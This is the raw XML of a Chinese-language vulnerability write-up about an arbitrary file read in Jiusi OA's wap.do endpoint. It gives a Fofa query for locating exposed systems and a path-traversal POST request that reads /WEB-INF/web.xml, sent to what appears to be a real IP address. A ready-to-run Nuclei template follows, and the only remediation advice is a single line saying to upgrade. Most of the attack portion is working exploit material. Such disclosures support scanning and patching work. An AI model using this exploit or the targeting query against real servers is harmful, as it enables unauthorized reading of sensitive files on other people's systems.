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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>北京九思协同软件有限公司九思OA wap.do 任意文件读取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漏洞描述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九思OA系统是安装、实施、学习、操作、维护的OA系统，由北京九思协同软件有限公司开发。当下北京九思协同办公软件存在任意文件读取漏洞，攻击者可利用该漏洞获取服务器敏感信息等。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漏洞复现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Fofa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body="/jsoa/webmail/ajax_util.js"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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138420" cy="2030095"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1206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38420" cy="2030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界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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078095" cy="2332355"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1460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8095" cy="2332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POC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POST /jsoa/wap.do?method=downLoad HTTP/1.1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Host: 61.145.190.160:82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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36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path=../&amp;name=&amp;FileName=/WEB-INF/web.xml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182235" cy="3498215"/>
            <wp:effectExtent l="0" t="0" r="14605" b="698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2235" cy="3498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Nucle脚本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id: js-oa-wap-readfile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info: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name: 北京九思协同软件有限公司九思OA wap.do 任意文件读取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author: m0be1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severity: high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description: 九思OA系统是安装、实施、学习、操作、维护的OA系统，由北京九思协同软件有限公司开发。当下北京九思协同办公软件存在任意文件读取漏洞，攻击者可利用该漏洞获取服务器敏感信息等。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reference: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- https://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metadata: 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fofa-query: body="/jsoa/webmail/ajax_util.js" &amp;&amp; title!="中国世纪新城投资集团协同办公系统"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verified: true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max-request: 1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http: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- raw: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- |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POST /jsoa/wap.do?method=downLoad HTTP/1.1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Host: {{Hostname}}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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36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path=../&amp;name=&amp;FileName=/WEB-INF/web.xml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matchers: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- type: dsl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dsl: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- 'status_code==200 &amp;&amp; contains_all(body,"&lt;?xml")'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修复建议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1、升级到安全版本。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322A651"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F322A65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VlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="1BDB7245"/>
    <w:rsid w:val="363216A2"/>
    <w:rsid w:val="7BDA2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2023-11-30T13:40:19Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-30T14:06:49Z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4C12E78FBAF34D318B9D280272F12505_12</vt:lpwstr>
  </property>
</Properties>
</file>